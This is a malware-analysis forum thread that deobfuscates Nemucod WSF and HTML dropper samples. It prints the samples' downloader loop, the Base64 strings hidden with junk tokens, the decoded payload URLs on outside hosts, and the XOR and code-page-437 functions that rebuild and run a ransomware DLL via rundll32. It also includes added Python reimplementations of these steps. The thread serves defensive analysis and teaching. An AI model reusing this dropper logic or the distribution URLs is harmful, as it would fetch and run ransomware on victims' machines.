Malware Analysis Deobfuscation of wsf samples 3 & 4 (Malware Vault) : wsf-dropper-js_nemucod

DardiM

3 files from: https://malwaretips.com/threads/31-8-16-6.62930/
(Thanks to @Solarquest)

Sample 3 : csnLmN.wsf
Sample 4 : d13gTz.wsf
Sample 1 : qXKlF.html


5/55 Antivirus scan for 044510cf9b3c0ac7c60df3a8717ed9d0f150112168d97c1cdbe63839d49fbeed at 2016-08-31 13:12:22 UTC - VirusTotal
5/56 Antivirus scan for 8d1f122fcbe0da9a3b1081552398bdffd55670d4348fff31711ba81d61107788 at 2016-08-31 13:13:35 UTC - VirusTotal

=> Similar obfuscation methods were used in a previous sample I analyzed:

https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/

There are some changes, but the URLs used are easily retrieved with the same method I used before.

1) Samples 3 & 4: same URLs & payload name(s):

Looking at the end of the script:

var mahorkavodkatvarMASHEVHORDA17 = "sYCfiSIE";
var mahorkavodkatvarTRAxKey = mahorkavodkatvarMASHEVfsta("i4qGajo8QJA8VtuKNag3OyYhcnIEKcql");

var mahorkavodkatvarMASHEV_a5 =
[
    "d3POUNId3LnlhY2h0LW1hcmtldC5lPOUNIdS9qaEJIVFls",
    "dPOUNI3d3LnBvbGktbWVjLml0L2poQkhUWWPOUNIw=",
    "d3POUNId3LmVxdWlwZTQuPOUNIbmV0L2poQkhUWWw="
];
var mahorkavodkatvarMASHEVHORDAI = 0;
for(mahorkavodkatvarMASHEVHORDA5 in mahorkavodkatvarMASHEV_a5){
    mahorkavodkatvarMASHEVHORDAI++;
    try{
        var mahorkavodkatvarMASHEVHORDA6 = "http://"+mahorkavodkatvarMASHEV_a5[mahorkavodkatvarMASHEVHORDA5].mahorkavodkatvarDREAMTEAM() + "?mssGTlVi=KiqvaljO";
        mahorkavodkatvarMASHEV_a2(mahorkavodkatvarMASHEVHORDA6,mahorkavodkatvarMASHEVHORDA17+mahorkavodkatvarMASHEVHORDAI);
    }catch(mahorkavodkatvarMASHEVCEESZZAAA){}
}

Explanations:

Names for the downloaded files:

"sYCfiSIE" + index

=> sYCfiSIE1
=> sYCfiSIE2
=> sYCfiSIE3

URLs:

An array is easy to find with these values:

"bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=POUNI=",
"aWZ0aWtoYXJjaGF1POUNIZGhyeS41MHdlYnMuY29tL2poQkhUWWw=",
"POUNIbW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="

These are Base64 strings, but with a junk token inserted to obfuscate them a bit more.

Looking at the function that does the decoding:

.mahorkavodkatvarDREAMTEAM()
String.prototype.mahorkavodkatvarDREAMTEAM = function() {
    mahorkavodkatvarMASHEVXCOP = 0;
    var mahorkavodkatvarMASHEVddDccC1, mahorkavodkatvarMASHEVddDccC2, mahorkavodkatvarMASHEVc3, mahorkavodkatvarMASHEVc4;
    var mahorkavodkatvarMASHEVout = "";
    // strip the junk token first, then Base64-decode what is left
    var mahorkavodkatvarMASHEVpechenka= this["replace"](/POUNI/g, '');
    var mahorkavodkatvarMASHEVlen = mahorkavodkatvarMASHEVsud(mahorkavodkatvarMASHEVpechenka);
    ...
    ... (Base64 decode stuff)
    ...
}

this["replace"](/POUNI/g, ''); => every POUNI has to be removed from the string the method is called on, to get back the real Base64 strings:

"bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=POUNI=",
"aWZ0aWtoYXJjaGF1POUNIZGhyeS41MHdlYnMuY29tL2poQkhUWWw=",
"POUNIbW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="

=>
Real Base64 strings:
"bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=="
"aWZ0aWtoYXJjaGF1ZGhyeS41MHdlYnMuY29tL2poQkhUWWw="
"bW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw="

With a Base64 decode tool:


=> URLs:

"http://" + "lanjaron.es.mialias.net/jhBHTYl" + "?UXRxPvxm=QKvTymv"
"http://" + "iftikharchaudhry.50webs.com/jhBHTYl" + "?UXRxPvxm=QKvTymv"
"http://" + "mojejeze.republika.pl/jhBHTYl" + "?UXRxPvxm=QKvTymv"

Payload (3 names, but exactly the same ransomware):

"http://" + "lanjaron.es.mialias.net/jhBHTYl?UXRxPvxm=QKvTymv"
=> sYCfiSIE1 => sYCfiSIE1.dll

"http://" + "iftikharchaudhry.50webs.com/jhBHTYl?UXRxPvxm=QKvTymv"
=> sYCfiSIE2 => sYCfiSIE2.dll

"http://" + "mojejeze.republika.pl/jhBHTYl?UXRxPvxm=QKvTymv"
=> sYCfiSIE3 => sYCfiSIE3.dll

The .dll extension is only added once the deobfuscation of the downloaded file succeeds (i.e. it turns out to be a real DLL).
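The manual steps above (strip the POUNI junk, Base64-decode, prepend "http://" and append the query string, name the local file prefix + index) as a small Python deobfuscator. This is an added example, not code from the post or from the sample: the three obfuscated strings, the query string and the name prefix are the ones shown above, and the junk token is a parameter so the same function also handles the LUABUA variant of sample 1 in part 5.

```python
import base64

# Values copied from the analysis above (samples 3 & 4).
JUNK_TOKEN = "POUNI"
OBFUSCATED = [
    "bGFuamFyb24uZXMubWlhbGlhcy5uZXQvamhCSFRZbA=POUNI=",
    "aWZ0aWtoYXJjaGF1POUNIZGhyeS41MHdlYnMuY29tL2poQkhUWWw=",
    "POUNIbW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw=",
]
QUERY = "?UXRxPvxm=QKvTymv"
NAME_PREFIX = "sYCfiSIE"


def strip_junk(s: str, token: str = JUNK_TOKEN) -> str:
    """Mirror of this.replace(/POUNI/g, ''): drop every copy of the junk token,
    wherever it was inserted (it can even sit between the '=' padding chars)."""
    return s.replace(token, "")


def decode_host_path(s: str, token: str = JUNK_TOKEN) -> str:
    """Junk removal followed by a plain Base64 decode of the host/path part."""
    clean = strip_junk(s, token)
    # Re-pad defensively in case the junk token shared characters with the padding.
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean, validate=True).decode("ascii")


def recover_downloads(entries, query=QUERY, prefix=NAME_PREFIX, token=JUNK_TOKEN):
    """Rebuild (url, local_name) pairs the way the dropper's loop does:
    'http://' + decoded + query, local name = prefix + 1-based index
    (the counter is incremented before the download call)."""
    result = []
    for index, entry in enumerate(entries, start=1):
        url = "http://" + decode_host_path(entry, token) + query
        result.append((url, f"{prefix}{index}"))
    return result


if __name__ == "__main__":
    for url, name in recover_downloads(OBFUSCATED):
        print(f"{name}\t{url}")
```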

2) NEMUCOD part:

The functions used to deobfuscate the downloaded file and turn it into a real .dll:

var mahorkavodkatvarMASHEVLUCIODOR = "CWZ1bmN0aW9uIG1haG9ya2F2b2RrYXR2YXJNQVNIRVZydGZ0YShmaWxlUGF0aCkNCnsNCiAgICB2YXIgbWFob3JrYXZvZGthdHZhcklTSEVWcm9zdGVrcz1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogICAgbWFob3JrYXZvZGthdHZhcklTSEVWcm9zdGVrc1s ..........................................

As usual, these functions are hidden in a variable holding a Base64-encoded string.
The decoded result (originally in a spoiler):
function mahorkavodkatvarMASHEVrtfta(filePath)
{

var mahorkavodkatvarISHEVrosteks=WScript["CreateObject"]("ADODB.Stream");
mahorkavodkatvarISHEVrosteks["type"]=2;
mahorkavodkatvarISHEVrosteks["Charset"]=437;
mahorkavodkatvarISHEVrosteks["open"]();
mahorkavodkatvarISHEVrosteks["LoadFromFile"](filePath);
var fileString=mahorkavodkatvarISHEVrosteks["ReadText"];
mahorkavodkatvarISHEVrosteks["close"]();
return mahorkavodkatvarMASHEVfsta(fileString);
};
function mahorkavodkatvarMASHEVfats(codeArray)
{

var t2=new Array();
var t2=new Array();

t2[0x80]=0x00C7;t2[0x81]=0x00FC;t2[0x82]=0x00E9;t2[0x83]=0x00E2;t2[0x84]=0x00E4;t2[0x85]=0x00E0;t2[0x86]=0x00E5;t2[0x87]=0x00E7;t2[0x88]=0x00EA;t2[0x89]=0x00EB;t2[0x8A]=0x00E8;t2[0x8B]=0x00EF;t2[0x8C]=0x00EE;t2[0x8D]=0x00EC;t2[0x8E]=0x00C4;t2[0x8F]=0x00C5;t2[0x90]=0x00C9;t2[0x91]=0x00E6;t2[0x92]=0x00C6;t2[0x93]=0x00F4;t2[0x94]=0x00F6;t2[0x95]=0x00F2;t2[0x96]=0x00FB;t2[0x97]=0x00F9;t2[0x98]=0x00FF;t2[0x99]=0x00D6;t2[0x9A]=0x00DC;t2[0x9B]=0x00A2;t2[0x9C]=0x00A3;t2[0x9D]=0x00A5;t2[0x9E]=0x20A7;t2[0x9F]=0x0192;t2[0xA0]=0x00E1;t2[0xA1]=0x00ED;t2[0xA2]=0x00F3;t2[0xA3]=0x00FA;t2[0xA4]=0x00F1;t2[0xA5]=0x00D1;t2[0xA6]=0x00AA;t2[0xA7]=0x00BA;t2[0xA8]=0x00BF;t2[0xA9]=0x2310;t2[0xAA]=0x00AC;t2[0xAB]=0x00BD;t2[0xAC]=0x00BC;t2[0xAD]=0x00A1;t2[0xAE]=0x00AB;t2[0xAF]=0x00BB;t2[0xB0]=0x2591;t2[0xB1]=0x2592;t2[0xB2]=0x2593;t2[0xB3]=0x2502;t2[0xB4]=0x2524;t2[0xB5]=0x2561;t2[0xB6]=0x2562;t2[0xB7]=0x2556;t2[0xB8]=0x2555;t2[0xB9]=0x2563;t2[0xBA]=0x2551;t2[0xBB]=0x2557;t2[0xBC]=0x255D;t2[0xBD]=0x255C;t2[0xBE]=0x255B;t2[0xBF]=0x2510;t2[0xC0]=0x2514;t2[0xC1]=0x2534;t2[0xC2]=0x252C;t2[0xC3]=0x251C;t2[0xC4]=0x2500;t2[0xC5]=0x253C;t2[0xC6]=0x255E;t2[0xC7]=0x255F;t2[0xC8]=0x255A;t2[0xC9]=0x2554;t2[0xCA]=0x2569;t2[0xCB]=0x2566;t2[0xCC]=0x2560;t2[0xCD]=0x2550;t2[0xCE]=0x256C;t2[0xCF]=0x2567;t2[0xD0]=0x2568;t2[0xD1]=0x2564;t2[0xD2]=0x2565;t2[0xD3]=0x2559;t2[0xD4]=0x2558;t2[0xD5]=0x2552;t2[0xD6]=0x2553;t2[0xD7]=0x256B;t2[0xD8]=0x256A;t2[0xD9]=0x2518;t2[0xDA]=0x250C;t2[0xDB]=0x2588;t2[0xDC]=0x2584;t2[0xDD]=0x258C;t2[0xDE]=0x2590;t2[0xDF]=0x2580;t2[0xE0]=0x03B1;t2[0xE1]=0x00DF;t2[0xE2]=0x0393;t2[0xE3]=0x03C0;t2[0xE4]=0x03A3;t2[0xE5]=0x03C3;t2[0xE6]=0x00B5;t2[0xE7]=0x03C4;t2[0xE8]=0x03A6;t2[0xE9]=0x0398;t2[0xEA]=0x03A9;t2[0xEB]=0x03B4;t2[0xEC]=0x221E;t2[0xED]=0x03C6;t2[0xEE]=0x03B5;t2[0xEF]=0x2229;t2[0xF0]=0x2261;t2[0xF1]=0x00B1;t2[0xF2]=0x2265;t2[0xF3]=0x2264;t2[0xF4]=0x2320;t2[0xF5]=0x2321;t2[0xF6]=0x00F7;t2[0xF7]=0x2248;t2[0xF8]=0x00B0;t2[0xF9]=0x2219;t2[0xFA]=0x00B7;t2[0xFB]=0x221A;t2[0xFC]=0x207F;
t2[0xFD]=0x00B2;t2[0xFE]=0x25A0;t2[0xFF]=0x00A0;


var EGj=new Array();
var resultString="";
var HIi3;
var OVc9;
for (var Tj=0; Tj < codeArray["length"]; Tj++)

{
HIi3=codeArray[Tj];
if (HIi3 < 128){
OVc9=HIi3;
}
else
{

OVc9=t2[HIi3];}
EGj.push(String["fromCharCode"](OVc9));
}
resultString=EGj["join"]("");

return resultString;
};

function mahorkavodkatvarMASHEVsatt(filePath, codeArray)

{
var mahorkavodkatvarISHEVrosteks=WScript["CreateObject"]("ADODB.Stream");
mahorkavodkatvarISHEVrosteks["type"]=2;
mahorkavodkatvarISHEVrosteks["Charset"]=437;
mahorkavodkatvarISHEVrosteks["open"]();
mahorkavodkatvarISHEVrosteks["writeText"](mahorkavodkatvarMASHEVfats(codeArray));
mahorkavodkatvarISHEVrosteks["SaveToFile"](filePath, 2);
mahorkavodkatvarISHEVrosteks["close"]();
};


function mahorkavodkatvarMASHEVxdac(mahorkavodkatvarMASHEVcca)

{
for (var Tj=0; Tj < mahorkavodkatvarMASHEVcca["length"]; Tj++)
{


mahorkavodkatvarMASHEVcca[Tj] ^= mahorkavodkatvarTRAxKey[Math.floor(Tj % mahorkavodkatvarTRAxKey.length)];

}
return mahorkavodkatvarMASHEVcca;

};
The encoded key used for the XOR part (shown in red in the original post):

var mahorkavodkatvarTRAxKey = mahorkavodkatvarMASHEVfsta("i4qGajo8QJA8VtuKNag3OyYhcnIEKcql");

It returns the real key string; each of its chars is used in turn for the famous XOR part: ^=
(once every char of the key has been used, it jumps back to the first char and continues)

function xdac(content_file)
{
    // XOR every byte with the key; the modulo makes the key index wrap around
    for (var index = 0; index < content_file.length; index++)
    {
        content_file[index] ^= xKey[Math.floor(index % xKey.length)];
    }
    return content_file;
};


See previous analysis :
https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/
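The Nemucod decode stage in Python, as an added example (not code from the post or the sample): xor_with_key mirrors xdac(), and bytes_via_cp437_text shows why the big t2 table exists, since fats() plus Charset 437 is just a lossless way to push raw bytes through ADODB.Stream's text mode. The key and the MZ-headed payload are constructed; the post does not show fsta(), so the key derivation and any decoding it performs are left out.

```python
# Constructed inputs: a stand-in key (the real one comes from ...fsta(), whose
# body the post does not show) and a fake payload that starts like a PE file.
DEMO_KEY = b"DemoKey!"
DEMO_PLAIN = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
              b"This program cannot be run in DOS mode.\r\n$")


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Mirror of xdac(): byte i is XORed with key[i % len(key)], so the key
    wraps to its first character once exhausted. XOR is its own inverse, so
    the same call both encodes and decodes."""
    if not key:
        raise ValueError("empty XOR key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def bytes_via_cp437_text(data: bytes) -> bytes:
    """Mirror of fats() + satt(): bytes < 0x80 are kept, bytes >= 0x80 are
    mapped through the code-page 437 table (the t2 array), and the resulting
    text is written with Charset=437. Python's cp437 codec is that same
    table, so the round trip reproduces every byte: this is how the script
    writes a binary .dll through a text-mode ADODB.Stream."""
    text = data.decode("cp437")    # fats(): String.fromCharCode(t2[b]) per byte
    return text.encode("cp437")    # satt(): writeText + SaveToFile, Charset 437


def recover_payload(encoded: bytes, key: bytes) -> bytes:
    """What the dropper does to the downloaded bytes before running them."""
    return bytes_via_cp437_text(xor_with_key(encoded, key))


def looks_like_pe(data: bytes) -> bool:
    """The check an analyst runs before giving the result its .dll extension."""
    return data[:2] == b"MZ"


if __name__ == "__main__":
    downloaded = xor_with_key(DEMO_PLAIN, DEMO_KEY)  # what would sit on disk as sYCfiSIE1
    recovered = recover_payload(downloaded, DEMO_KEY)
    print("downloaded looks like PE:", looks_like_pe(downloaded))
    print("recovered  looks like PE:", looks_like_pe(recovered))
```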

3) Run:

rundll32 is used with the file path, and the parameter passed to the DLL is: qwerty

4) Difference with other Nemucod samples:

To deobfuscate the payload, some functions seen in the latest Nemucod version (in other downloader scripts) are not present here (same as in the analysis of the similar wsf droppers linked above).

=> Only the XOR part is left, so these scripts are easier to handle.

In the latest version I have seen in other scripted downloaders, the XOR part uses:

uheprng(){
...
...
}

var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}

function rawprng(){

...
...
}

etc.

5) Sample 1 is similar: qXKlF.html

The only differences:

this.replace(/LUABUA/g, ''); => the junk token is LUABUA instead of POUNI
eval(alkotesterzercerLOBIKLUCIODOR); => eval of the hidden part

var alkotesterzercerLOBIKHORDA17 = "EhFjFSNri"; => name prefix of the downloaded (still obfuscated) files

var alkotesterzercerTRAxKey = alkotesterzercerLOBIKfsta("OQX7NmUJ9OUmet5z24IaOwr0HoASBB7j");

Result: the decoded key used for the XOR part

var alkotesterzercerLOBIK_a5 =
[
    "d3d3Lml0b2dhemFpZLUABUAGFuLmpwL0hKZ2hqdDg3Mg==",
    "Y29udmVuaWxpZLUABUAmVjYW5iZS53ZWIuZmMyLmNvbS9ISmdoanQ4NzI=",
    "ZnJlZXVzZWQud2ViLmZjMi5jb20vSEpnaGp0ODcy"
];

Base64 decode:
URLs:

"http://" + "www.itogazaidan.jp/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
"http://" + "convenilifecanbe.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
"http://" + "freeused.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"

PAYLOAD:

EhFjFSNri1 => EhFjFSNri1.dll
EhFjFSNri2 => EhFjFSNri2.dll
EhFjFSNri3 => EhFjFSNri3.dll


Svoll

I like this format more, easier for a beginner like me to understand, showing the conclusion first then breaking it down. Thanks for making such a detailed guide for non-techies to understand. Was able to properly guess the pattern, follow along to decoding the URL and Payload.

DardiM

> I like this format more, easier for a beginner like me to understand, showing the conclusion first then breaking it down. Thanks for making such a detailed guide for non-techies to understand. Was able to properly guess the pattern, follow along to decoding the URL and Payload.
Thanks :)
The nemucod part, at the end, is the part of a string hidden somewhere in the script, for this family. This encoded string hides the functions that make the deobfuscation of the payload, downloaded by the other parts of the script, shown in part 1.
Then, I don't really show the conclusion first, only the "normal" obfuscated part that downloads the payload, and in part 2: the content of the encoded string: the nemucod functions.